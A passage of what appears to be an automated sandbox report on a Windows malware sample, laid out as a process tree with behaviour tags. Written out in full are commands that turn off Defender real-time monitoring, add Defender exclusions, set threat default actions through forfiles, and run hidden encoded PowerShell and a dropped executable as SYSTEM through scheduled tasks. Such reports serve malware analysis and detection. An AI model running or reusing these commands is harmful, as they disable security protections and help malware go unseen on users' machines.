                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                  4⤵
                                                  • Indirect Command Execution
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1660
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    5⤵
                                                      PID:812
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        6⤵
                                                          PID:2188
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                      4⤵
                                                      • Indirect Command Execution
                                                      PID:2524
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:1692
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:1360
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                          4⤵
                                                          • Indirect Command Execution
                                                          PID:2060
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                            5⤵
                                                              PID:832
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Drops file in System32 directory
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2308
                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                  7⤵
                                                                    PID:1880
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "gonvAhOLb" /SC once /ST 02:09:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2804
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "gonvAhOLb"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1848
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /DELETE /F /TN "gonvAhOLb"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2512
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2392
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                              4⤵
                                                              • Modifies Windows Defender Real-time Protection settings
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1196
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1920
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                              4⤵
                                                              • Modifies Windows Defender Real-time Protection settings
                                                              PID:348
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "geCuHCEnP" /SC once /ST 02:23:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:844
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "geCuHCEnP"
                                                            3⤵
                                                              PID:2288
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /DELETE /F /TN "geCuHCEnP"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2416
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                              3⤵
                                                              • Indirect Command Execution
                                                              PID:2428
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                4⤵
                                                                  PID:812
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                    5⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Drops file in System32 directory
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1660
                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                      6⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1536
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:1256
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                    • Windows security bypass
                                                                    PID:996
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:2224
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • Windows security bypass
                                                                      PID:2552
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                      PID:2228
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:2168
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                          PID:680
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1852
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /C copy nul "C:\Windows\Temp\VLvKqTazivYGshTO\hPXXzVuo\UnZhnzDGBejjSizK.wsf"
                                                                          3⤵
                                                                            PID:1868
                                                                          • C:\Windows\SysWOW64\wscript.exe
                                                                            wscript "C:\Windows\Temp\VLvKqTazivYGshTO\hPXXzVuo\UnZhnzDGBejjSizK.wsf"
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:1136
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1304
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:876
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:2292
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:484
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:1468
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:2728
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:992
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:1720
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1716
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:1832
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:1032
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1920
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:844
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1576
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1436
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:2440
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:1244
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:2952
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:2236
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1572
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:2576
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:64
                                                                                  4⤵
                                                                                    PID:932
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:32
                                                                                    4⤵
                                                                                      PID:2548
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:64
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2260
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2692
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:64
                                                                                      4⤵
                                                                                        PID:2184
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                          PID:2528
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:64
                                                                                          4⤵
                                                                                            PID:2188
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:32
                                                                                            4⤵
                                                                                              PID:2448
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:64
                                                                                              4⤵
                                                                                                PID:1928
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2912
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                  PID:2900
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:2980
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:64
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1952
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                                                    4⤵
                                                                                                      PID:2180
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2580
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "geinNyBHk" /SC once /ST 03:19:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1236
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /run /I /tn "geinNyBHk"
                                                                                                    3⤵
                                                                                                      PID:3020
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "geinNyBHk"
                                                                                                      3⤵
                                                                                                        PID:1896
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                        3⤵
                                                                                                          PID:2288
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                            4⤵
                                                                                                              PID:1620
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1336
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                              4⤵
                                                                                                                PID:2932
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "cszbzSIAjSjUwyOsr" /SC once /ST 02:14:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe\" bH /sDpsdidAn 385121 /S" /V1 /F
                                                                                                              3⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:2068
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn "cszbzSIAjSjUwyOsr"
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1676
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 628
                                                                                                              3⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Program crash
                                                                                                              PID:1956
                                                                                                          • C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe
                                                                                                            C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe bH /sDpsdidAn 385121 /S
                                                                                                            2⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops Chrome extension
                                                                                                            • Drops file in System32 directory
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2300
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2276
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                4⤵
                                                                                                                • Indirect Command Execution
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1696
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                  5⤵
                                                                                                                    PID:2576
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                      6⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2696
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                  4⤵
                                                                                                                  • Indirect Command Execution
                                                                                                                  PID:1120
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                    5⤵
                                                                                                                      PID:1916
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
